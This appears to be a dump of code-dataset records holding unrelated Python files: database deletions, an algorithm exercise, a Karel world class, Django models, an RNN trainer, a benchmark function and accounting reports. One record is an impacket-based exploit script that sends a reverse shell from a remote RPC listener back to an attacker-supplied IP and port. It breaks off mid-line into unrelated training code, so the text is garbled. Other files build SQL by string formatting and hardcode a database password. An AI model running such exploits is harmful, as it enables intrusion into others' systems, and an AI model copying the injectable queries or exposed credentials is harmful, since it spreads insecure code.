AccountingDay where fl_accountingyear = \\'%s\\'' % (periode_code)\r\n strSQLDelAccPer = 'delete from AccountingPeriode where fl_accountingyear = \\'%s\\'' % (periode_code)\r\n strSQLDelAccYear = 'delete from AccountingYear where periode_code = \\'%s\\'' % (periode_code)\r\n\r\n config.ExecSQL(strSQLDelAccDay)\r\n config.ExecSQL(strSQLDelAccPer)\r\n config.ExecSQL(strSQLDelAccYear)\r\n\r\n config.Commit()\r\n except:\r\n config.Rollback()\r\n raise\r\n\r\n return 1\r\n","sub_path":"scripts/master/delete accyear.py","file_name":"delete accyear.py","file_ext":"py","file_size_in_byte":1495,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"298686303","text":"# [2019.01.17_문제4_구간합]\n# N개의 숫자 중에 이웃한 3가지의 숫자의 합이 가장 큰 수와 가장 작은 수의 차를 구하라\n\n# [입력]\n# 첫 줄에 테스트 케이스 개수 T가 주어진다. ( 1 ≤ T ≤ 50 )\n# 다음 줄부터 테스트케이스의 첫 줄에 정수의 개수 N과 구간의 개수 M 주어진다. ( 10 ≤ N ≤ 100, 2 ≤ M < N )\n# 다음 줄에 N개의 정수 ai가 주어진다. ( 1 ≤ a ≤ 10000 )\n\n# [출력]\n# 각 줄마다 \"#T\" (T는 테스트 케이스 번호)를 출력한 뒤, 답을 출력한다.\n\n###### 구간 M개의 합들의 list를 만들고 거기서 min max 골라서 차를 구한다 ######\n###### 숫자의 크기 순으로 나열한 뒤에 앞에 세개 뒤에 세개 ######\n\nimport sys\nsys.stdin = open('구간합_input.txt','r')\n\nT = int(input())\n\nfor test_case in range(1,T+1):\n \n p = list(map(int,input().split()))\n num = list(map(int,input().split()))\n n,m = p[0],p[1]\n min_result = sum(num[:m])\n max_result = sum(num[:m])\n\n for i in range(1,n-m+1):\n if min_result > sum(num[i:m+i]):\n min_result = sum(num[i:m+i])\n if max_result < sum(num[i:m+i]):\n max_result = sum(num[i:m+i])\n\n print(f'#{test_case} {max_result - min_result}')\n","sub_path":"Algorithm/19.01/190117/sw_sol4_구간합.py","file_name":"sw_sol4_구간합.py","file_ext":"py","file_size_in_byte":1274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"8592632","text":"\"\"\"\nThis file defines the class definition of a Karel world.\n\nThe sub header comment defines important notes about the Karel\nworld file 
format. \n\nOriginal Author: Nicholas Bowman\nCredits: Kylie Jue \nLicense: MIT\nVersion: 1.0.0\nEmail: nbowman@stanford.edu\nDate of Creation: 10/1/2019\nLast Modified: 3/31/2020\n\"\"\"\n\n\"\"\"\nGeneral Notes About World Construction \n- Streets run EAST-WEST (rows)\n- Avenues run NORTH-SOUTH (columns)\n\nWorld File Constraints:\n- World file should specify one component per line in the format\n KEYWORD: PARAMETERS\n- Any lines with no colon delimiter will be ignored\n- The accepted KEYWORD, PARAMETER combinations are as follows:\n\t- Dimension: (num_avenues, num_streets)\n\t- Wall: (avenue, street); direction\n\t- Beeper: (avenue, street) count\n\t- Karel: (avenue, street); direction\n\t- Color: (avenue, street); color\n\t- Speed: delay\n\t- BeeperBag: num_beepers\n- Multiple parameter values for the same keyword should be separated by a semicolon\n- All numerical values (except delay) must be expressed as ints. The exception\n to this is that the number of beepers can also be INFINITY\n- Any specified color values must be valid TKinter color strings, and are limited\n to the set of colors \n- Direction is case-insensitive and can be one of the following values:\n\t- East\n\t- West\n\t- North \n\t- South\t\n\"\"\"\n\nfrom karel.kareldefinitions import *\nimport collections\nimport re\nimport copy\n\nclass KarelWorld():\n\tdef __init__(self, world_file=None):\n\t\t\"\"\"\n\t\tKarel World constructor\n\t\tParameters:\n\t\t\tworld_file: Open file object containing information about the initial state of Karel's world\n\t\t\"\"\"\n\t\tself._world_file = world_file\n\n\t\t# Map of beeper locations to the count of beepers at that location\n\t\tself._beepers = collections.defaultdict(int)\n\n\t\t# Map of corner colors, defaults to None\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\n\t\t# Set of Wall objects placed in the world\n\t\tself._walls = set()\n\n\t\t# Dimensions of the world\n\t\tself._num_streets = 1\n\t\tself._num_avenues = 1\n\n\t\t# 
Initial Karel state saved to enable world reset\n\t\tself._karel_starting_location = (1, 1)\n\t\tself._karel_starting_direction = Direction.EAST\n\t\tself._karel_starting_beeper_count = 0\n\n\t\t# Initial speed slider setting\n\t\tself._init_speed = INIT_SPEED\n\n\t\t# If a world file has been specified, load world details from the file\n\t\tif self._world_file:\n\t\t\tself.load_from_file()\n\n\t\t# Save initial beeper state to enable world reset\n\t\tself._init_beepers = copy.deepcopy(self._beepers)\n\n\t@property\n\tdef karel_starting_location(self):\n\t\treturn self._karel_starting_location\n\n\t@property\n\tdef karel_starting_direction(self):\n\t\treturn self._karel_starting_direction\n\n\t@property\n\tdef karel_starting_beeper_count(self):\n\t\treturn self._karel_starting_beeper_count\n\t\n\t@property\n\tdef init_speed(self):\n\t\treturn self._init_speed\n\n\t@property\n\tdef num_streets(self):\n\t\treturn self._num_streets\n\n\t@num_streets.setter\n\tdef num_streets(self, val):\n\t\tself._num_streets = val\n\n\t@property\n\tdef num_avenues(self):\n\t\treturn self._num_avenues\n\t\n\t@num_avenues.setter\n\tdef num_avenues(self, val):\n\t\tself._num_avenues = val\n\n\t@property\n\tdef beepers(self):\n\t\treturn self._beepers\n\n\t@property\n\tdef corner_colors(self):\n\t\treturn self._corner_colors\n\t\n\t@property\n\tdef walls(self):\n\t\treturn self._walls\n\t\n\tdef load_from_file(self):\n\t\tdef parse_line(line):\n\t\t\t# Ignore blank lines and lines with no comma delineator\n\t\t\tif not line or \":\" not in line:\n\t\t\t\treturn None, None, False\n\n\t\t\tparams = {}\n\t\t\tcomponents = line.strip().split(KEYWORD_DELIM)\n\t\t\tkeyword = components[0].lower()\n\n\t\t\t# only accept valid keywords as defined in world file spec\n\t\t\tif keyword not in VALID_WORLD_KEYWORDS:\n\t\t\t\treturn None, None, False\n\n\t\t\tparam_list = components[1].split(PARAM_DELIM)\n\n\t\t\tfor param in param_list:\n\t\t\t\tparam = param.strip().lower()\n\n\t\t\t\t# first check 
to see if the parameter is a direction value\n\t\t\t\tif param in VALID_DIRECTIONS:\n\t\t\t\t\tparams[\"dir\"] = DIRECTIONS_MAP[param]\n\t\t\t\telse:\n\t\t\t\t\t# next check to see if parameter encodes a location\n\t\t\t\t\tcoordinate = re.match(r\"\\((\\d+),\\s*(\\d+)\\)\", param)\n\t\t\t\t\tif coordinate:\n\t\t\t\t\t\tavenue = int(coordinate.group(1))\n\t\t\t\t\t\tstreet = int(coordinate.group(2))\n\t\t\t\t\t\tparams[\"loc\"] = (avenue, street)\n\t\t\t\t\telse:\n\t\t\t\t\t\t# finally check to see if parameter encodes a numerical value or color string\n\t\t\t\t\t\tval = None\n\t\t\t\t\t\tif param.isdigit():\n\t\t\t\t\t\t\tval = int(param)\n\t\t\t\t\t\telif keyword == \"speed\":\n\t\t\t\t\t\t\t# double values are only allowed for speed parameter\n\t\t\t\t\t\t\ttry:\n\t\t\t\t\t\t\t\tval = int(100 * float(param))\n\t\t\t\t\t\t\texcept ValueError:\n\t\t\t\t\t\t\t\t# invalid parameter value, do not process\n\t\t\t\t\t\t\t\tcontinue\n\t\t\t\t\t\telif keyword == \"beeperbag\":\n\t\t\t\t\t\t\t# handle the edge case where Karel has infinite beepers\n\t\t\t\t\t\t\tif param == \"infinity\" or param == \"infinite\":\n\t\t\t\t\t\t\t\tval = INFINITY\n\t\t\t\t\t\telif keyword == \"color\":\n\t\t\t\t\t\t\t# TODO: add check for valid color? 
\n\t\t\t\t\t\t\tval = param \n\t\t\t\t\t\t# only store non-null values\n\t\t\t\t\t\tif val is not None: params[\"val\"] = val\n\n\t\t\treturn keyword.lower(), params, True\n\n\n\t\tfor i, line in enumerate(self._world_file):\n\t\t\tkeyword, params, is_valid = parse_line(line)\n\n\t\t\t# skip invalid lines (comments, incorrectly formatted, invalid keyword)\n\t\t\tif not is_valid:\n\t\t\t\t# print(f\"Ignoring line {i} of world file: {line.strip()}\")\n\t\t\t\tcontinue\n\n\t\t\t# TODO: add error detection for keywords with insufficient parameters\n\n\t\t\t# handle all different possible keyword cases\n\t\t\tif keyword == \"dimension\":\n\t\t\t\t# set world dimensions based on location values\n\t\t\t\tself._num_avenues, self._num_streets = params[\"loc\"]\n\n\t\t\telif keyword == \"wall\":\n\t\t\t\t# build a wall at the specified location\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tdirection = params[\"dir\"]\n\t\t\t\tself._walls.add(Wall(avenue, street, direction))\n\n\t\t\telif keyword == \"beeper\":\n\t\t\t\t# add the specified number of beepers to the world\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tcount = params[\"val\"]\n\t\t\t\tself._beepers[(avenue, street)] += count\n\n\t\t\telif keyword == \"karel\":\n\t\t\t\t# Give Karel initial state values\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tdirection = params[\"dir\"]\n\t\t\t\tself._karel_starting_location = (avenue, street)\n\t\t\t\tself._karel_starting_direction = direction\n\n\t\t\telif keyword == \"beeperbag\":\n\t\t\t\t# Set Karel's initial beeper bag count\n\t\t\t\tcount = params[\"val\"]\n\t\t\t\tself._karel_starting_beeper_count = count\n\n\t\t\telif keyword == \"speed\":\n\t\t\t\t# Set delay speed of program execution\n\t\t\t\tspeed = params[\"val\"]\n\t\t\t\tself._init_speed = speed\n\n\t\t\telif keyword == \"color\":\n\t\t\t\t# Set corner color to be specified color\n\t\t\t\tavenue, street = params[\"loc\"]\n\t\t\t\tcolor = params[\"val\"]\n\t\t\t\tself._corner_colors[(avenue, 
street)] = color\n\n\tdef add_beeper(self, avenue, street):\n\t\tself._beepers[(avenue, street)] += 1\n\n\tdef remove_beeper(self, avenue, street):\n\t\tif self._beepers[(avenue, street)] == 0:\n\t\t\treturn\n\t\tself._beepers[(avenue, street)] -= 1\n\n\tdef add_wall(self, wall):\n\t\talt_wall = self.get_alt_wall(wall)\n\t\tif wall not in self._walls and alt_wall not in self._walls:\n\t\t\tself._walls.add(wall)\n\n\tdef remove_wall(self, wall):\n\t\talt_wall = self.get_alt_wall(wall)\n\t\tif wall in self._walls:\n\t\t\tself._walls.remove(wall)\n\t\tif alt_wall in self._walls:\n\t\t\tself._walls.remove(alt_wall)\n\t\t\n\tdef get_alt_wall(self, wall):\n\t\tif wall.direction == Direction.NORTH:\n\t\t\treturn Wall(wall.avenue, wall.street + 1, Direction.SOUTH)\n\t\tif wall.direction == Direction.SOUTH:\n\t\t\treturn Wall(wall.avenue, wall.street - 1, Direction.NORTH)\n\t\tif wall.direction == Direction.EAST:\n\t\t\treturn Wall(wall.avenue + 1, wall.street, Direction.WEST)\n\t\tif wall.direction == Direction.WEST:\n\t\t\treturn Wall(wall.avenue - 1, wall.street, Direction.EAST)\n\n\tdef paint_corner(self, avenue, street, color):\n\t\tself._corner_colors[(avenue, street)] = color\n\n\tdef corner_color(self, avenue, street):\n\t\treturn self._corner_colors[(avenue, street)]\n\n\tdef reset_corner(self, avenue, street):\n\t\tself._beepers[(avenue, street)] = 0\n\t\tself._corner_colors[(avenue, street)] = \"\"\n\n\tdef wall_exists(self, avenue, street, direction):\n\t\twall = Wall(avenue, street, direction)\n\t\treturn wall in self._walls\n\n\tdef in_bounds(self, avenue, street):\n\t\treturn avenue > 0 and street > 0 and avenue <= self._num_avenues and street <= self._num_streets\n\n\tdef reset_world(self):\n\t\t\"\"\"\n\t\tReset initial state of beepers in the world\n\t\t\"\"\"\n\t\tself._beepers = copy.deepcopy(self._init_beepers)\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\n\tdef reload_world(self, filename=None):\n\t\t\"\"\"\n\t\tTODO: Do better 
decomp to not just copy constructor\n\t\t\"\"\"\n\t\t\n\t\tself._beepers = collections.defaultdict(int)\n\t\tself._corner_colors = collections.defaultdict(lambda: \"\")\n\t\tself._walls = set()\n\n\t\tself._num_streets = 1\n\t\tself._num_avenues = 1\n\n\t\tself._karel_starting_location = (1, 1)\n\t\tself._karel_starting_direction = Direction.EAST\n\t\tself._karel_starting_beeper_count = 0\n\n\t\tself._init_speed = INIT_SPEED\n\n\t\tif filename:\n\t\t\tself._world_file = open(filename, 'r')\n\t\t\tself.load_from_file()\n\n\t\tself._init_beepers = copy.deepcopy(self._beepers)\n\n\tdef save_to_file(self, filename, karel):\n\t\twith open(filename, \"w\") as f:\n\t\t\t# First, output dimensions of world\n\t\t\tf.write(f\"Dimension: ({self.num_avenues}, {self.num_streets})\\n\")\n\n\t\t\t# Next, output all walls\n\t\t\tfor wall in self._walls:\n\t\t\t\tf.write(f\"Wall: ({wall.avenue}, {wall.street}); {DIRECTIONS_MAP_INVERSE[wall.direction]}\\n\")\n\n\t\t\t# Next, output all beepers\n\t\t\tfor loc, count in self._beepers.items():\n\t\t\t\tf.write(f\"Beeper: ({loc[0]}, {loc[1]}); {count}\\n\")\n\n\t\t\t# Next, output all color information\n\t\t\tfor loc, color in self._corner_colors.items():\n\t\t\t\tif color:\n\t\t\t\t\tf.write(f\"Color: ({loc[0]}, {loc[1]}); {color}\\n\")\n\n\t\t\t# Next, output Karel information\n\t\t\tf.write(f\"Karel: ({karel.avenue}, {karel.street}); {DIRECTIONS_MAP_INVERSE[karel.direction]}\\n\")\n\t\t\t\n\t\t\t# Finally, output beeperbag info\n\t\t\tbeeper_output = karel.num_beepers if karel.num_beepers >= 0 else \"INFINITY\"\n\t\t\tf.write(f\"BeeperBag: {beeper_output}\\n\")\n","sub_path":"diagnostic/karel/KarelWorld.py","file_name":"KarelWorld.py","file_ext":"py","file_size_in_byte":9862,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"512931182","text":"from django.conf import settings\nfrom django.contrib.auth.models import User as AuthUser\nfrom django.contrib.auth.models import 
AbstractUser\nfrom django.contrib.auth.models import UserManager as AuthUserManager\nfrom django.contrib.auth.signals import user_logged_in\nfrom django.core.mail import send_mail\nfrom django.db import models\nfrom django.db.models.signals import post_save\n\n\n\n'''\nclass User(AuthUser):\n class Meta:\n proxy = True\n\n @property\n def name(self):\n return '{} {}'.format(self.last_name, self.first_name)\n'''\n\nclass UserManager(AuthUserManager):\n def create_superuser(self, username, email, password, **extra_fields):\n extra_fields.setdefault('sex', 'm')\n return super().create_superuser(username, email, password, **extra_fields)\n\n\nclass User(AbstractUser):\n sex = models.CharField(\n max_length=1, \n default = 1,\n choices=(\n ('f', 'female'),\n ('m', 'male')\n ))\n\n \n\nclass Profile(models.Model):\n user = models.OneToOneField(settings.AUTH_USER_MODEL, on_delete=models.CASCADE)\n bio = models.TextField(blank=True)\n website_url = models.URLField(blank=True)\n part = models.IntegerField(\n default = 1,\n choices=(\n (1, '가슴'),\n (2, '배')\n )\n )\n\n\ndef on_post_save_for_user(sender, **kwargs):\n if kwargs['created']:\n # 가입 시기\n user = kwargs['instance']\n #Profile.objects.create(user=user)\n\n # 환영 이메일 보내기\n send_mail(\n '환영합니다',\n 'Here is the message',\n 'me@gmail.com',\n [user.email],\n fail_silently=False,\n )\n\npost_save.connect(on_post_save_for_user, sender=settings.AUTH_USER_MODEL)\n\n\nclass UserSession(models.Model):\n user = models.ForeignKey(settings.AUTH_USER_MODEL, on_delete=models.CASCADE, editable=False)\n session_key = models.CharField(max_length=40, editable=False)\n created_at = models.DateTimeField(auto_now_add=True)\n\n\n\ndef kick_my_other_sessions(sender, request, user, **kwargs):\n print(\"kicked my other sessions\")\n user.is_user_logged_in = True\n\nuser_logged_in.connect(kick_my_other_sessions, 
dispatch_uid='user_logged_in')","sub_path":"accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2252,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"288577101","text":"import argparse\nfrom impacket.structure import Structure\nfrom impacket.uuid import uuidtup_to_bin\nfrom impacket.dcerpc.v5 import transport\nfrom impacket.dcerpc.v5.rpcrt import DCERPCException\nfrom impacket.dcerpc.v5.transport import DCERPCTransportFactory\n\nparser = argparse.ArgumentParser()\nparser.add_argument(\"-rip\", help=\"Remote computer to target\", dest=\"target_ip\", type=str, required=True)\nparser.add_argument(\"-rport\", help=\"IP of the remote procedure listener\", dest=\"port\", type=int, required=True)\nparser.add_argument(\"-lip\", help=\"Local IP to receive the reverse shell\", dest=\"lip\", type=str, required=True)\nparser.add_argument(\"-lport\", help=\"Local port to receive the reverse shell\", dest=\"lport\", type=int, required=True)\n\nargs = parser.parse_args()\ntarget_ip = args.target_ip\nport = args.port\nlip = args.lip\nlport = args.lport\n\nclass SendReverseShell(Structure):\n global lip\n global lport\n print(lip, lport)\n format_ip = f\"<{len(lip) + 1}s\"\n structure = (\n # Yeah fuck this x)\n ('unknown', '<12s'),\n # <(Size of ip address + \\x00)s\n ('ip_address', format_ip),\n # <5 - (Size of len(port)xh\n ('port', \"= size:\r\n batch_end = size\r\n\r\n\r\n var_x = self.to_variable(x[i:batch_end])\r\n var_y = self.to_variable(y[i:batch_end], True)\r\n\r\n y_res = self.model(var_x)\r\n # if not train:\r\n # print('y_res:',y_res)\r\n # print('var_y:',var_y)\r\n\r\n loss = self.loss_function(y_res, var_y)\r\n\r\n #only for train step, update the network\r\n if train:\r\n self.optimizer.zero_grad()\r\n loss.backward()\r\n self.optimizer.step()\r\n\r\n # loss_sum += loss.item()\r\n losses.append(loss.item())\r\n i = batch_end\r\n\r\n pred_y = y_res.data.cpu()\r\n pred_y = 
torch.max(F.softmax(pred_y, dim=1), 1)[1]\r\n pred_res_total.extend(pred_y)\r\n\r\n\r\n acc = self.get_accuracy(y, np.array(pred_res_total))\r\n\r\n # ave_loss = loss_sum / batch_number\r\n ave_loss = np.average(losses)\r\n\r\n return acc, ave_loss\r\n\r\n def train_model(self):\r\n train_acc_list, train_loss_list, val_acc_list, val_loss_list = [], [], [], []\r\n\r\n for epoch in range(EPOCHES):\r\n\r\n train_acc, train_loss = self.train()\r\n\r\n # add into the list to save\r\n train_acc_list.append(train_acc)\r\n train_loss_list.append(train_loss)\r\n\r\n #test val\r\n val_acc, val_loss = self.train(train=False,val=True)\r\n val_acc_list.append(val_acc)\r\n val_loss_list.append(val_loss)\r\n\r\n\r\n if epoch%200 == 0:\r\n print('epoch {}'.format(epoch))\r\n print('Train: accuracy is %.1f, average loss is %.2f' % (train_acc * 100, train_loss))\r\n print('Val: accuracy is %.1f, average loss is %.2f' % (val_acc * 100, val_loss))\r\n\r\n self.earlystop(val_loss, val_acc,self.model, self.lr, self.hidden_size, self.model_type, self.init_weight_type,self.path,dic_save_all)\r\n\r\n return train_acc_list, train_loss_list, val_acc_list, val_loss_list\r\n\r\n\r\n\r\n\r\n\r\n\r\n\r\n def draw_plot(self,train_list,dev_list,acc=True):\r\n plt.figure()\r\n plt.plot(np.array(train_list))\r\n plt.plot(np.array(dev_list))\r\n if acc:\r\n plt.title('model={}_lr={}_hidden={}_inw={}_Accuracy'.format(self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n plt.ylabel('accuracy')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'val'], loc='upper left')\r\n plt.savefig(\"{}model={}_lr={}_hidden={}_inw={}_Accuracy.jpg\".format(self.path,self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n # plt.show()\r\n\r\n else:\r\n plt.title('model={}_lr={}_hidden={}_inw={}_Loss'.format(self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n plt.ylabel('loss')\r\n plt.xlabel('epoch')\r\n plt.legend(['train', 'val'], loc='upper left')\r\n 
plt.savefig(\"{}model={}_lr={}_hidden={}_inw={}_Loss.jpg\".format(self.path,self.model_type,self.lr,self.hidden_size,self.init_weight_type))\r\n # plt.show()\r\n plt.close()\r\n\r\n\r\n def draw_acc_and_loss(self, list):\r\n train_acc_list, train_loss_list, val_acc_list, val_loss_list = list[0], list[1], list[2], list[3]\r\n self.draw_plot(train_acc_list, val_acc_list, True)\r\n self.draw_plot(train_loss_list, val_loss_list, False)\r\n\r\ndef print_dic_to_csv(dic,path):\r\n dic = OrderedDict(sorted(dic.items(),key=lambda t: t[1][0]))\r\n # print(dic)\r\n df = pd.DataFrame.from_dict(dic,orient=\"index\")\r\n df.to_csv(path+\"models.csv\")\r\n\r\n\r\n\r\n\r\ndef main():\r\n global dic_save_all\r\n \"\"\"\r\n total three test\r\n 1:Adam\r\n 2:RMSprop\r\n 3:SGD + momentum \r\n represent:\r\n model type: 0: RNN 1: LSTM 2:GRU\r\n init_weight_type: 0: normal 1: xavier_normal 2: orthogonal 3: uniform\r\n\r\n :return:\r\n \"\"\"\r\n\r\n # dataset = DataSet(TARGET,TIME_STEP,)\r\n # f = open('dataset_w.txt','wb')\r\n # pickle.dump(dataset,f)\r\n # f.close()\r\n\r\n\r\n #test 1: Adam op_type=0\r\n\r\n path = save_path + 'Adam\\\\'\r\n learning_rates = [0.001,0.002]\r\n\r\n\r\n\r\n for lr in learning_rates:\r\n for hidden in hiddens:\r\n #should be four\r\n for init_weight in range(3):\r\n for model_type in range(1,3):\r\n #init the trainer with different parameters and rnn\r\n trainer = Trainer(2,hidden,2,path,model_type=model_type,lr=lr,op_type=0,init_weight_type=init_weight,dropout=0)\r\n #get the train and val acc and loss\r\n lists = trainer.train_model()\r\n #draw the acc and loss\r\n trainer.draw_acc_and_loss(lists)\r\n\r\n # print(dic_save_all)\r\n print_dic_to_csv(dic_save_all,path)\r\n\r\n\r\n #test 2:\r\n # dic_save_all = {}\r\n #\r\n # path = save_path + 'RMSprop\\\\'\r\n # learning_rates = [0.001, 0.002]\r\n #\r\n # for lr in learning_rates:\r\n # for hidden in hiddens:\r\n # # should be four\r\n # for init_weight in range(4):\r\n # for model_type in range(3):\r\n 
# # init the trainer with different parameters and rnn\r\n # trainer = Trainer(2, hidden, 2, path, model_type=model_type, lr=lr, op_type=1,init_weight_type=init_weight, dropout=0)\r\n # # get the train and val acc and loss\r\n # lists = trainer.train_model()\r\n # # draw the acc and loss\r\n # trainer.draw_acc_and_loss(lists)\r\n #\r\n # # print(dic_save_all)\r\n # print_dic_to_csv(dic_save_all, path)\r\n\r\n #test 3:\r\n dic_save_all = {}\r\n\r\n path = save_path + 'SGD_mom\\\\'\r\n learning_rates = [0.001,0.01]\r\n\r\n\r\n for lr in learning_rates:\r\n for hidden in hiddens:\r\n # should be four\r\n for init_weight in range(3):\r\n for model_type in range(1,3):\r\n # init the trainer with different parameters and rnn\r\n trainer = Trainer(2, hidden, 2, path, model_type=model_type, lr=lr, op_type=2,init_weight_type=init_weight, dropout=0)\r\n # get the train and val acc and loss\r\n lists = trainer.train_model()\r\n # draw the acc and loss\r\n trainer.draw_acc_and_loss(lists)\r\n print_dic_to_csv(dic_save_all, path)\r\n\r\n\r\nif __name__ =='__main__':\r\n\r\n main()\r\n\r\n\r\n\r\n\r\n","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10425,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"548712222","text":"#!/usr/bin/env python\n# ------------------------------------------------------------------------------------------------------%\n# Created by \"Thieu Nguyen\" at 16:07, 20/04/2020 %\n# %\n# Email: nguyenthieu2102@gmail.com %\n# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %\n# Github: https://github.com/thieu1995 %\n#-------------------------------------------------------------------------------------------------------%\n\nfrom opfunu.cec.cec2005.root import Root\nfrom numpy import dot, sin, cos\nfrom pandas import read_csv\n\n\nclass Model(Root):\n def __init__(self, f_name=\"Schwefel's Problem 2.13\", f_shift_data_file=\"data_schwefel_213\",\n 
f_ext='.txt', f_bias=-460):\n Root.__init__(self, f_name, f_shift_data_file, f_ext, f_bias)\n\n def load_shift_data(self):\n data = read_csv(self.support_path_data + self.f_shift_data_file + self.f_ext, delimiter='\\s+', index_col=False, header=None)\n data = data.values\n a_matrix = data[:100, :]\n b_matrix = data[100:200, :]\n shift_data = data[200:, :]\n return shift_data, a_matrix, b_matrix\n\n def _main__(self, solution=None):\n problem_size = len(solution)\n if problem_size > 100:\n print(\"CEC 2005 not support for problem size > 100\")\n return 1\n shift_data, a_matrix, b_matrix = self.load_shift_data()\n shift_data = shift_data.reshape(-1)[:problem_size]\n a_matrix = a_matrix[:problem_size, :problem_size]\n b_matrix = b_matrix[:problem_size, :problem_size]\n\n result = 0.0\n for i in range(0, problem_size):\n t1 = dot(a_matrix[i], sin(shift_data)) + dot(b_matrix[i], cos(shift_data))\n t2 = dot(a_matrix[i], sin(solution)) + dot(b_matrix[i], cos(solution))\n result += (t1-t2)**2\n return result + self.f_bias\n\n","sub_path":"opfunu/cec/cec2005/F12.py","file_name":"F12.py","file_ext":"py","file_size_in_byte":2169,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"39428065","text":"from sqlalchemy import create_engine\r\nimport pandas as pd\r\nimport numpy as np\r\nfrom datetime import date,datetime,timedelta\r\nimport smtplib\r\nfrom email.mime.multipart import MIMEMultipart\r\nfrom email.mime.text import MIMEText\r\n\r\ndef create_imtrn(businessId):\r\n engine = create_engine('postgresql://postgres:Asaddat098765432!@localhost:5432/da')\r\n\r\n #bring in the imtrn for stock and sales analysis:\r\n df_imtrn = pd.read_sql('select ztime,zutime,zid,ximtrnnum,xitem,xwh,xdate,xyear,xper,xqty,xval,xdoctype,xdocnum,xsec,xproj,xbatch,xcus,xsup,xaction,xsign,xstdprice from imtrn where zid = %s' %(businessId), con=engine)\r\n\r\n #quantity in or out total\r\n df_imtrn['xflow'] = df_imtrn['xqty'] * df_imtrn['xsign']\r\n 
df_imtrn['xavgcost'] = df_imtrn['xval']/df_imtrn['xqty']\r\n\r\n #seperate out the prefix just in case and make a new key with customer,item and date\r\n df_imtrn['ximtrnprefix'] = df_imtrn['ximtrnnum'].apply(lambda x: x.split('0')[0])\r\n df_imtrn['ximtrnprefix'] = df_imtrn['ximtrnprefix'].apply(lambda x: x.split('1')[0])\r\n\r\n return df_imtrn\r\n\r\ndef create_gldetail(businessId):\r\n engine = create_engine('postgresql://postgres:Asaddat098765432!@localhost:5432/da')\r\n\r\n df_detail = pd.read_sql('select ztime,zutime,zid,xvoucher,xacc,xaccusage,xaccsource,xsub,xproj,xprime,zemail,xpaytype from gldetail where zid = %s'%(businessId), con = engine)\r\n df_header = pd.read_sql('select ztime,zid,xvoucher,xref,xdate,xyear,xper,xstatusjv from glheader where zid = %s'% (businessId),con=engine)\r\n df_glmst = pd.read_sql('select xacc,xdesc,xacctype,xaccusage,xaccsource,xhrc1,xhrc2 from glmst where zid = %s'%(businessId), con=engine)\r\n df_detail = df_detail.merge(df_header,on='xvoucher',how='left')\r\n df_detail = df_detail.merge(df_glmst,on='xacc',how='left')\r\n df_detail['day_head'] = df_detail['xdate'].apply(lambda x: x.day)\r\n df_detail['month_head'] = df_detail['xdate'].apply(lambda x: x.month)\r\n df_detail['year_head'] = df_detail['xdate'].apply(lambda x: x.year)\r\n df_detail['xvouch'] = df_detail['xvoucher'].apply(lambda x: x.split('0')[0])\r\n df_detail['xvouch'] = df_detail['xvouch'].apply(lambda x: x.split('1')[0])\r\n\r\n return df_detail\r\n\r\ndef check_Trasaction(businessId):\r\n now_year = datetime.now().year\r\n last_month = datetime.now().month - 1\r\n\r\n if (last_month == 0):\r\n now_year = now_year - 1\r\n last_month = 12\r\n else:\r\n pass\r\n\r\n df_imtrn = create_imtrn(businessId)\r\n df_imtrn = df_imtrn[(df_imtrn['xyear']==now_year) & (df_imtrn['xper']==last_month)]\r\n\r\n impr_list = df_imtrn['ximtrnprefix'].value_counts().index.tolist()\r\n wh_list = df_imtrn['xwh'].value_counts().index.tolist()\r\n\r\n df_trn = 
pd.DataFrame(index=impr_list)\r\n df_trn = df_trn.reset_index()\r\n df_trn = df_trn.rename(columns={'index':'ximtrnprefix'})\r\n\r\n for i in wh_list:\r\n df_wh = pd.DataFrame(df_imtrn[df_imtrn['xwh']==i].groupby('ximtrnprefix')['xval'].sum())\r\n df_wh = df_wh.reset_index()\r\n df_trn = df_trn.merge(df_wh,on='ximtrnprefix',how='left')\r\n df_trn = df_trn.rename(columns={'xval':'%s'%(i)})\r\n\r\n df_trn = df_trn.fillna(value=0,axis=1)\r\n df_trn = df_trn.round(2)\r\n\r\n return df_trn\r\n\r\ndef check_glim(businessId):\r\n now_year = datetime.now().year\r\n last_month = datetime.now().month - 1\r\n\r\n if (last_month == 0):\r\n now_year = now_year - 1\r\n last_month = 12\r\n else:\r\n pass\r\n\r\n df_detail = create_gldetail(businessId)\r\n df_detail = df_detail[(df_detail['xyear']==now_year) & (df_detail['xper']==last_month)]\r\n\r\n glTran_list = ['ITCS','CSJV','RMIS','FIAD','RIAD','MORE','SRET']\r\n df_trn = pd.DataFrame(index=glTran_list)\r\n df_trn = df_trn.reset_index()\r\n df_trn = df_trn.rename(columns={'index':'xvouch'})\r\n\r\n pr_list = df_detail['xproj'].value_counts().index.tolist()\r\n\r\n for i in pr_list:\r\n df_proj = pd.DataFrame(df_detail[(df_detail['xproj']==i) & (df_detail['xacctype']=='Expenditure')].groupby('xvouch')['xprime'].sum())\r\n df_proj = df_proj.reset_index()\r\n df_trn = df_trn.merge(df_proj,on='xvouch',how='left')\r\n df_trn = df_trn.rename(columns={'xprime':'%s'%(i)})\r\n\r\n df_trn = df_trn.fillna(value=0,axis=1)\r\n df_trn = df_trn.round(2)\r\n\r\n return df_trn\r\n\r\ndf_tranKarigor = check_Trasaction(100000)\r\ndf_glimKarigor = check_glim(100000)\r\ndf_tranTrading = check_Trasaction(100001)\r\ndf_glimTrading = 